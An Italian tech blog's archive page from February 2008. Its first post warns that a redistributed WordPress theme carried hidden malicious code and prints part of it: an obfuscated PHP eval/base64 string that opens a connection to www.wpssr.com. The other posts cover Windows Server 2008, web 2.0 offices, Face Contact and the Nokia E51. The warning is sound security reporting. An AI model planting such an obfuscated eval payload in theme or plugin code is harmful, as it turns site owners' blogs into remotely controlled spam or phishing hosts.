Aggregatore di News, Informatica, Video e molto altro ancora.

Archivi mensili per febbraio, 2008

Temi potenzialmente pericolosi per WordPress

feb01
2008 Lascia un commento Scritto da admin

logo wordpressUn post recentemente apparso sul forum di WordPress Italy ha posto in primo piano il problema sicurezza all’interno dei temi per la famosa piattaforma di blogging, diffusa sulla rete tanto da avere una folta schiera di appassionati che ogni giorno pubblicano su Internet nuovi template.

Allarmato dal dilagare di casi analoghi, lo staff di WordPress ha quindi deciso di mettere pubblicamente in guardia i propri utenti, citando il caso ormai diventato celebre di Derek Punsalan, un designer di Seattle che ha pubblicato sul web diversi temi, ripresi anche da siti esterni non ufficiali: proprio uno di questi, WP-Sphere, presentava alcune modifiche all’interno del codice realizzato da Punsalan, in particolare vi era stata una stringa, apparentemente innocua.

Tale pezzo di codice, che riportiamo nella seconda parte del post, secondo indagini effettuate dallo stesso Punsalan con l’ausilio di informatici esperti, non nasconderebbe altro che istruzioni maligne codificate, contenenti, come tanti altri temi scaricati da terzi, operazioni di spam o di fishing: se vedete tale codice all’interno delle righe di un template come prima cosa quindi provvedete ad eliminarlo, evitando così che il vostro blog possa diventare uno zombie in mano a malintenzionati.

@eval(@base64_decode(’aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw
gJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICR
SNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3I
iOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMD
kxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMk
QwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1Qj
M5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRj
EyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNT
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIj
sgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OT
cgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3OD

In termini più tecnici, a conferma di quanto appena riportato, su codescout.org è stata riportata un’analisi approfondita riguardante proprio il codice sovrastante, dalla quale è risultato un tentativo da parte della sezione maligna del tema di effettuare l’apertura di una connessione verso il sito www.wpssr.com, effettuando in caso di successo operazioni molto poco chiare e “pulite”: il tutto sfruttando la funzione eval di PHP.

I consigli per non incappare in spiacevoli sorprese sono sempre i soliti: oltre a quello sopra citato, stare attenti alle fonti da cui si effettua il download di temi e plugin, privilegiando la galleria ufficiale di WordPress.

Pubblicato sotto - INFORMATICA -, Sicurezza

Maina: Windows Server 2008

feb01
2008 Lascia un commento Scritto da admin

Inserito il 01 Febbraio 2008

Manuel Maina, Product Marketing Manager di Windows Server 2008, ci parla del concetto di virtualizzazione intergrata nel nuovo sistema operativo Microsoft, oltre che di sicurezza e amministrazione delle risorse

Pubblicato sotto - Video Stream -, Video Tecnologia

Gli uffici del web 2.0

feb01
2008 Lascia un commento Scritto da admin

Uffici TwitterIl web 2.0 sta rivoluzionando il mondo della rete e non solo. Ogni giorno nuovi servizi nascono e contribuiscono ad ampliare il nostro social network ed i conti in banca delle menti che li creano. Vi siete mai chiesti chi c’è dietro Twitter, Facebook o Digg? Persone come noi che mangiano, bevono e vanno al bagno? E soprattutto, dove nascono le loro idee? Dove lavorano? I loro uffici sono simili ai nostri sempre più simili a spazi di fantozziana memoria, sterili ed asettiche stanze con tristi piante di ficus di dimensioni proporzionali al livello di inquadramento degli occupanti?

UADDit ha fatto una carrellata di fotografie degli uffici delle più importanti compagnie del web 2.0. Una porta anonima nasconde l’ampio open space di Twitter, con scrivanie disposte un po’ a casaccio ed ognuna con la sua piccola pianta. Aspetto più serioso in casa Facebook, dove la creatività spinge a superare barriere architettoniche pur di scrivere su di una lavagna. Tutti intorno ad un tavolone per gli uomini Mozilla, mentre spazi ordinati per gli uffici di Flickr, in netto contrasto con la simpatica foto dei suoi uomini. Strano poi osservare che Jaiku, comprata da Google, e Netvibes si limitino ad attaccare dietro la porta un semplice foglio A4 del loro logo: modestia?

Insomma, pare evidente che dove nascono le galline dalle uova d’oro 2.0 si preferiscano gli spazi ampi e la loro condivisione agli uffici pieni di muri e porte a cui noi siamo abituati. E se ci fate caso, quasi tutti usano dei Mac: sarà un caso?

Via | UADDit

Pubblicato sotto - INFORMATICA -, Foto

Social networking retribuito: il caso di Face Contact

feb01
2008 Lascia un commento Scritto da admin

facecontact-logoIl fenomeno del social networking non conosce sosta. Questa volta vi parliamo di Face Contact, un nuovo servizio che è recentemente apparso e che si basa sullo stesso meccanismo di altri siti di cui abbiamo già parlato, come LinkedIn, Facebook, Plaxo, NotchUp, OpenSocial: la registrazione al sito permette di inserire i propri dati e di invitare i conoscenti tramite e-mail, quindi si creano delle connessioni basate sulle conoscenze che ognuno ha e che permettono di condividere idee, progetti, foto, giochi, opportunità di business. Ognuna delle comunità descritte ha una sua caratterizzazione specifica, come LinkedIn per i professionisti o Facebook per le amicizie personali, ma tutte sono basate sulla gratuità dei servizi base.

Sulla scia di NotchUp, che prevede un compenso per ogni colloquio fatto, il sito di Face Contact prevede dei compensi per ogni raccomandazione andata a buon fine: chi offre un lavoro, chi cerca investitori, chi cerca clienti, chi cerca casa può utilizzare il sito per farsi “suggerire” dei possibili contatti, ed in caso di buon esito si riceve un rimborso. Per spiegare meglio il funzionamento del servizio Face Contact ha realizzato in questa pagina una animazione che spiega il meccanismo delle raccomandazioni e della crescita dei contatti tramite l’invito delle propri amici/colleghi/familiari. Inoltre è stato realizzato un simulatore che in base al numero di contatti che si pensa di poter individuare fornisce una stima dei guadagni possibili. Il servizio permette di importare i propri contatti attraverso i profili già esistenti su Plaxo, LinkedIn, Gmail, Y!Mail, Aol, Msn, Outlook o direttamente in formato csv.

FaceContact è stato finalista nella competizione SeedCamp per le start-up europee organizzata da una gruppo di fondi di investimento. Durante la competizione, il top management di Google è rimasto entusiasta per la soluzione al problema delle raccomandazioni, perché Face Contact è efficiente grazie al meccanismo dei compensi e di qualità elevata grazie al meccanismo del social network. Ad oggi il servizio ha un’impronta nettamente internazionale, per cui è difficile trovare riferimenti italiani, ma con il contributo di tutti si potrà trovare qualche buona opportunità anche per noi!

Pubblicato sotto - INFORMATICA -, Web 2.0

Nokia E51

feb01
2008 Lascia un commento Scritto da admin

Inserito il 01 Febbraio 2008

Il Nokia E51 va a infoltire la già ricca gamma Business del produttore finlandese, con funzioni di tutto rispetto e un ventaglio di connessioni a 360°. La forma allungata e sottile non rispecchia la reale robustezza del terminale

Pubblicato sotto - Video Stream -, Video Tecnologia
Newer Entries

Partners

Gestionale online booking hotel

Informatica facile

ErEiSeR.org

Aste a ribasso

MondoGeek.it

Voleresserci

Il tuo sito qui ?

Archivi

Utilità

Add to Technorati Favorites

visitor stats

ADV

.